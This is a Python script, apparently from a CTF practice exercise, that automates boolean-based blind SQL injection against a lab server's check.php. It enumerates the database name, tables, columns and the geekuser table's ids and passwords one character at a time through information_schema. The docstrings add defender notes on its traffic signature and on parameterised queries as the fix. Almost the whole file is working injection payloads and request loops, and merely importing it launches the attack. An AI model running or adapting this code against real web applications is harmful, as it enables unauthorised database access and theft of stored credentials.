import requests
from urllib.parse import quote,unquote
import time
class SQL:
    """Boolean-based blind SQL injection walker for one CTF practice instance.

    Every probe is a GET to ``check.php`` on ``URL`` with the payload
    URL-encoded into the ``username`` query parameter and a fixed
    ``password=11``; the oracle is the literal substring ``'flag'`` in the
    response body. Instantiating the class runs the whole enumeration chain
    from ``__init__`` and prints the findings as it goes.

    Defender notes: the traffic signature of a run is a burst of GETs to
    ``check.php`` whose ``username`` value carries a single quote, ``or``,
    ``substring(`` / ``length(`` / ``group_concat(`` and ``information_schema``
    with a trailing ``#``; the server-side defect being probed is string-built
    SQL, which parameterised queries remove entirely.

    NOTE(review): the source file had no indentation at all; the block nesting
    below is reconstructed from statement order and should be checked against
    the original author's intent.
    """
    # Target of all probes: a one-off lab instance (per-user hostname).
    URL='http://0b810b9d-3e3a-4655-8cb2-44efea7ab49e.node5.buuoj.cn:81/'
    # Author's scratch note (Chinese): which alphabet to iterate in "for i in xxx" --
    # 1. a hand-typed keyboard row string, 2. range(ord('a'),ord('z')+1), 3. `ascii`.
    '''
    for i in xxx: ??
    1.qwertyuiopasdfghjklzxcvbnm, 手动输入键盘的字符
    2.range(ord('a'),ord('z')+1)
    3.ascii
    '''
    # Alphabet of printable ASCII 0x21..0x7E, built at class-definition time.
    # Shadows the builtin `ascii` inside this class; `i` also leaks as a class attribute.
    ascii=''
    for i in range(33,127):
        ascii+=chr(i)
    def __init__(self):
        """Run every enumeration step in order; each step prints what it finds."""
        self.判断当前数据库字符名称个数()
        self.当前数据库名称()
        self.表名称个数()
        self.表名()
        self.字段名个数()
        self.字段名()
        self.判断id个数()
        self.id()
        #self.username个数()
        self.idusernaempassword()
    def idusernaempassword(self):
        """Recover group_concat(password) from geekuser one character at a time.

        For each position ``ix`` every character of ``self.ascii`` is tried and
        the one whose probe response contains 'flag' is appended to ``daima``
        and printed. Pauses 0.1 s after each request; ``requests.get`` has no
        timeout, so a stalled connection blocks the loop.
        """
        daima=''
        for ix in range(0,10000):
            for i in self.ascii:
                sql=f"1' or (select substring(group_concat(password),{ix},1)='{i}' from geekuser) #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=str(i)
                    print(daima)
    def username个数(self):
        """Probe the length of group_concat(username) in geekuser.

        Not called: the call in ``__init__`` is commented out. Prints the
        decoded payload for every length value the oracle accepts.
        """
        for i in range(1,1000000000):
            sql=f"'1 or (select length(group_concat(username))={i} from geekuser) #"
            if self.sql注入(sql):
                print(self.sql注入(sql))
    def id(self):
        """Recover group_concat(id) from geekuser, trying 8 positions.

        Same probe shape and oracle as ``idusernaempassword``; prints the
        accumulated string after each confirmed character.
        """
        daima=''
        ascii=self.ascii  # local alias of the class alphabet (shadows the builtin)
        for ix in range(8):
            for i in ascii:
                sql=f"1' or (select substring(group_concat(id),{ix},1)='{i}' from geekuser) #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=str(i)
                    print(daima)
    def 判断id个数(self):
        """Probe length(group_concat(id)) in geek.geekuser for values 1..99 and print hits."""
        for i in range(1,100):
            sql=f"1' or (select length(group_concat(id))={i} from geek.geekuser) #"
            if self.sql注入(sql):
                print(self.sql注入(sql))
    def 字段名(self):
        """Recover the column names of geekuser from information_schema.COLUMNS.

        Alphabet is the hand-typed lowercase row plus ',' (group_concat
        separator); up to 21 positions. On a hit the accumulated string is
        printed, otherwise its current length and value are printed.
        """
        daima=''
        for ix in range(0,21):
            for i in 'qwertyuiopasdfghjklzxcvbnm,':
                sql=f"1' or (select substring(group_concat(COLUMN_NAME),{ix},1)='{i}' from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
                sql=quote(sql)
                url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                time.sleep(0.1)
                if 'flag' in res:
                    daima+=i
                    print(daima)
                else:
                    print(len(daima))
                    print(daima)
    def 字段名个数(self):
        """Probe length(group_concat(COLUMN_NAME)) for geekuser, values 1..99, and print hits."""
        for i in range(1,100):
            sql=f"1' or (select length(group_concat(COLUMN_NAME))={i} from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='geekuser') #"
            if self.sql注入(sql):
                print(self.sql注入(sql))
    def 表名(self):
        """Recover the table names of the current schema from information_schema.TABLES.

        Same lowercase-plus-comma alphabet as ``字段名``, up to 9 positions;
        this loop has no sleep between requests.
        """
        daima=''
        for ix in range(0,9):
            for i in 'qwertyuiopasdfghjklzxcvbnm,':
                sql=f"1' or (SELECT substring(GROUP_CONCAT(TABLE_NAME),{ix},1)='{i}' FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
                sql=quote(sql)
                url=url=f'{self.URL}check.php?username={sql}&password=11'
                res=requests.get(url).text
                if 'flag' in res:
                    daima+=i
                    print(daima)
    def 表名称个数(self):
        """Probe LENGTH(GROUP_CONCAT(TABLE_NAME)) for values 0..999; prints the result of every probe (None on a miss)."""
        for i in range(1000):
            sql=f"1' or (SELECT LENGTH(GROUP_CONCAT(TABLE_NAME))={i} FROM information_schema.TABLES WHERE TABLE_SCHEMA=DATABASE()) #"
            print(self.sql注入(sql))
    def 当前数据库名称(self):
        """Probe the 4th character of database() given the prefix 'gee'; prints every probe result."""
        for i in range(ord('a'),ord('z')+1):
            sql=f"1' or left(database(),4)='gee{chr(i)}' #"
            print(self.sql注入(sql))
    def 判断当前数据库字符名称个数(self):
        """Probe length(database()) for values 0..9; prints every probe result."""
        for count in range(10):
            sql=f"1' or length(database())={count} #"
            print(self.sql注入(sql))
    def sql注入(self,sql):
        """Send one probe and report whether the oracle fired.

        Args:
            sql: raw (unencoded) payload placed in the ``username`` parameter.

        Returns:
            The decoded payload when 'flag' appears in the response body,
            otherwise None (implicit fall-through). No request timeout is set.
        """
        sql=quote(sql)
        url=url=f'{self.URL}check.php?username={sql}&password=11'
        res=requests.get(url).text
        #time.sleep(0.1)
        if 'flag' in res:
            return unquote(sql)
# Module-level side effect: merely importing this file runs the whole chain
# against SQL.URL (there is no `if __name__ == "__main__":` guard).
sql=SQL()